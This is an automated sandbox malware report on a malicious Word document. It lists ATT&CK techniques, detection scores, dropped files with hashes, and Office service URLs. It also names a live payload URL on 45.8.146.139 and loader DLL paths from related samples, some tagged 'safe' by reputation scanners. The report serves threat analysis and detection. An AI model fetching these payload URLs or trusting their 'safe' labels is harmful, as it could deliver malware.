Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
airequipmentcorp-doc-08.11.2022.doc	25%	Virustotal		Browse
airequipmentcorp-doc-08.11.2022.doc	15%	ReversingLabs	Script-Macro.Trojan.Amphitryon
airequipmentcorp-doc-08.11.2022.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\~DF32F8B01FD4175FF7.TMP	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://my.microsoftpersonalcontent.com	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://login.microsoftonline.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://shell.suite.office.com:1443	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://autodiscover-s.outlook.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://roaming.edog.	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://cdn.entity.	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://powerlift.acompli.net	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://cortana.ai	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.aadrm.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.microsoftstream.com/api/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://cr.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://graph.ppe.windows.net	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://officeci.azurewebsites.net/api/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://my.microsoftpersonalcontent.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://globaldisco.crm.dynamics.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://messaging.engagement.office.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://dev0-api.acompli.net/autodetect	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://web.microsoftstream.com/video/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://dataservice.o365filtering.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://ncus.contentsync.	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
http://weather.service.msn.com/data.aspx	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://apis.live.net/v5.0/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://messaging.lifecycle.office.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://management.azure.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://outlook.office365.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://wus2.contentsync.	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.office.net	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://incidents.diagnosticssdf.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://entitlement.diagnostics.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://substrate.office.com/search/api/v2/init	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://outlook.office.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://outlook.office365.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://webshell.suite.office.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_	rECA2.tmp.exe, 00000002.00000002.273378499.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://messaging.lifecycle.office.com/getcustommessage16	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://devnull.onenote.com	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://messaging.action.office.com/	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high
https://ncus.pagecontentsync.	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.146.139	unknown	Russian Federation		44676	VMAGE-ASRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682577
Start date and time:	2022-08-11 18:07:15 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	airequipmentcorp-doc-08.11.2022.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.expl.winDOC@4/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 77%) Quality average: 59.9% Quality standard deviation: 39.4%
HCA Information:	Successful, ratio: 97% Number of executed functions: 13 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.191, 52.109.76.36, 52.109.76.33
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.8.146.139	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
	courtesyautomotivedoc08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
	drinkcodeblue.file.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
	dodsonimaging,file,08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
	feltenberger doc 08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
	agsilverfile08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VMAGE-ASRU	airequipmentcorp-doc-08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	courtesyautomotivedoc08.11.doc	Get hash	malicious	Browse	45.8.146.139
	drinkcodeblue.file.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	dodsonimaging,file,08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	feltenberger doc 08.11.doc	Get hash	malicious	Browse	45.8.146.139
	agsilverfile08.11.doc	Get hash	malicious	Browse	45.8.146.139
	GitmEGG60Q.exe	Get hash	malicious	Browse	45.159.251.68
	80J4pAFU0A.exe	Get hash	malicious	Browse	45.159.248.53
	Rwwsr82vkS.exe	Get hash	malicious	Browse	45.159.248.53
	sJq1pykxns.exe	Get hash	malicious	Browse	45.159.248.53
	3RkGCbnoKw.exe	Get hash	malicious	Browse	45.159.248.53
	60MLnq8Uma.exe	Get hash	malicious	Browse	45.159.248.53
	uGfpJynSWM.exe	Get hash	malicious	Browse	45.159.249.4
	MqYQkpHt4V.exe	Get hash	malicious	Browse	45.159.248.53
	0LYwkmJsgj.exe	Get hash	malicious	Browse	45.159.248.53
	P5u1ZAL6wF.exe	Get hash	malicious	Browse	45.159.248.53
	VbeTpPMvvK.exe	Get hash	malicious	Browse	45.159.248.53
	e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exe	Get hash	malicious	Browse	45.159.248.53

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse
	c.exe	Get hash	malicious	Browse
	edicomsrl file 18.07.doc	Get hash	malicious	Browse
	edicomsrl,document,18.07.doc	Get hash	malicious	Browse
	rbtGr2unq7.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll	Get hash	malicious	Browse
	QABqf4Xbw3.exe	Get hash	malicious	Browse
	ntelos.file.06.27.2022.doc	Get hash	malicious	Browse
	g.exe	Get hash	malicious	Browse
	S.exe	Get hash	malicious	Browse
	rB0luE6pL6.dll	Get hash	malicious	Browse
	I3Iz02L0Am.dll	Get hash	malicious	Browse
	svc32.dll	Get hash	malicious	Browse
	SecuriteInfo.com.DLOADER.Trojan.15098.dll	Get hash	malicious	Browse
	sIhckM7o37.exe	Get hash	malicious	Browse
	IhIrwzRKIW.exe	Get hash	malicious	Browse
	12CC7A3E17B45E971B1B950A6418E977D3FEDE2763FD7.exe	Get hash	malicious	Browse
	MkFX3RptDN.exe	Get hash	malicious	Browse
	zyvvMPPgTM.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3A11B302-44CB-4EB9-BCB8-49C2BE307D7C

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	148061
Entropy (8bit):	5.358136210068348
Encrypted:	false
SSDEEP:	1536:5cQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:A1Q9DQe+zuXYr
MD5:	F395C8F247D435AAEA3BE89CC2566428
SHA1:	9ADB47CE29DDFC26125804494EBAE31541B98BC9
SHA-256:	562FDD103601D3FEA5307524A58035AB9FC551809A7FE83E7DE560CAA9172ABE
SHA-512:	9B18B41C3B48F72EAA72161A812776FC96F1FB02ACE9D81736BDC203763445F0D6623D11BEC95DDC2B49712553F2C58201B22029A41ECE5F19A3DB60D657F9FE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T16:08:22">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2947CA03.png

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	255992
Entropy (8bit):	7.979945509057379
Encrypted:	false
SSDEEP:	6144:WA8X3URdstKeUr9pS3Ye1B496I0qupYLqUBq5QY:bRdCKBOYe1ByoqueLqi2F
MD5:	4FD2012027291C067724708876BD2AC6
SHA1:	11CF910537D108578F768263DA98CB954464AE8F
SHA-256:	43369516E53294BD97A1E3825B73708A407F33C6DB392DCE78415835362CA3AA
SHA-512:	EAFD06D13D5D04C8BD354023CC356EB9620CDCD1ED97097146CF878420545FB6C6DEFC9EC636A43F34401211DF5BA3AAFDE0120AE570F2E66FC000D0EA326D3D
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fGU.3..].^..{..~z.2....("....^BP.EH.........;. .n.4...P.Vd.D...DHB..9.Ow.....y...=k..........Z.j..Uk..}.Sp.&.H...x./1..dy........"i..I.1<=:.e....{..!...C.....S.._.3}8..A.J..o...,K...k.Z...z.}.I...8.j\y.-.^m.Ty...q...Z71FO....2..T7C.M....,c.)?..q..I.<..EK.......=.}.....'.!..z. ...m......7..._..:).E..tm.d..i.....2..6...=.-o......[.my{.....+jY.....5...-=.....rRU.\|.W...,K9.@....2..V......\|.[i.M.r.S..-..JK.J2[TZ.nC.G...R..l./Q.z..'.h=..oE[..A/.{.m..'Zz.7..I.k.....,~..i.2_..O.W.+.u..eI..E...oy@...p...S../...mYk.{u...S.z8.r@z./...o.d..^>ic..\|V..4...I..7Q.....Z.1...-.\|m3A:.C.m.T.D.2..QE...^..-.C-.u2$..2.X...AMW.\| i.zs.b..qM'.>..\|...t.....j.5&.9.C.nE..kQ.dyM....\|.....F....U...%_.@.[z...+..o.z....../.m.m>Q..^..X.,Z^..W.^.....a...X...O[u..6..'mV...U...1.5]c...C[V.[z..U^.>.,.[.....IYY...Xy".5..d...W.H.<h.g......Zd..@....v}T@...Yk+..z<`..C..g

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2F6F238A.png

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61935
Entropy (8bit):	7.988218918927523
Encrypted:	false
SSDEEP:	1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
MD5:	4800E90C87A78932178C7D338BA32F43
SHA1:	8006244EDAFF9A31546A17FCF99CB61DA4F69417
SHA-256:	8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
SHA-512:	58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
Malicious:	false
Reputation:	moderate, very likely benign file
